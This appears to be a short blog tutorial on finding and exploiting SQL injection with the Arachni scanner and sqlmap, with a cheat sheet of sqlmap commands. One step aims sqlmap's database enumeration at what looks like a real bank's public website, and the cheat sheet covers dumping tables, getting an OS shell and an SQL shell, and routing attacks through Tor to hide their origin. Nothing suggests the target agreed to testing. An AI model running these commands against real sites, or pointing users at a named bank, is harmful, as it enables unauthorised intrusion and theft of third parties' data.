SQLMAP With Arachni Scanner

Requirements:

OS: Windows 10
Compiler : Python 3.x
Script : SQLMAP
Scanner: Arachni Scanner

Step 1:- Download And Install "Arachni Scanner".
    https://www.arachni-scanner.com/download/

 

Step 2:- Open The Browser And Navigate To    "https://localhost:9292/users/sign_in/"

 

To Start A "New Scan", Click " +New " Icon.

 

 

Click On Go For "Scanning".

Here The "Scanning Starts".

 

Scan "Completed" And To "Download Report", Choose The Format And "Click Ok".

Step 3:- Open "Web Browser" And "Check One Time Again".

 

 

 

 

Step 4:- Follow My Previous Post On "SQL MAP" To Find A Target Navigate To The SQL MAP Folder In "Power Shell".
Execute The "Following Commands".

    python .\sqlmap.py -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B0219F2C-951C-B9F7-D1B6-805BA07752DB57D" –dbs

 

 

Step 5:- Follow The Same Steps As In My Previous Post On SQL MAP To Find "Database Names", "Table Names" And "Dump The Tables". Just Add The Following Option In It:-

SQL MAP OPTIONS

# It Will Check The Web Side Have Sql Error Or Not.
    Simply Put (“, ’, -).

# Enumerate Databases.
    sqlmap --dbms=mysql -u "$URL" --dbs

# Enumerate Tables.
    sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables

# Dump Table Data.
    sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump

# Specify Parameter To Exploit.
    sqlmap --dbms=mysql -u "http://www.example.com/param1=value1&param2=value2" --dbs -p param2

# Specify Parameter To Exploit In 'Nice' URIs.
    sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs # exploits param1

# Get OS Shell.
    sqlmap --dbms=mysql -u "$URL" --os-shell
  
# Get SQL Shell.
    sqlmap --dbms=mysql -u "$URL" --sql-shell
    
# SQL Query.
    sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"

# Use Tor Socks5 Proxy.
    sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs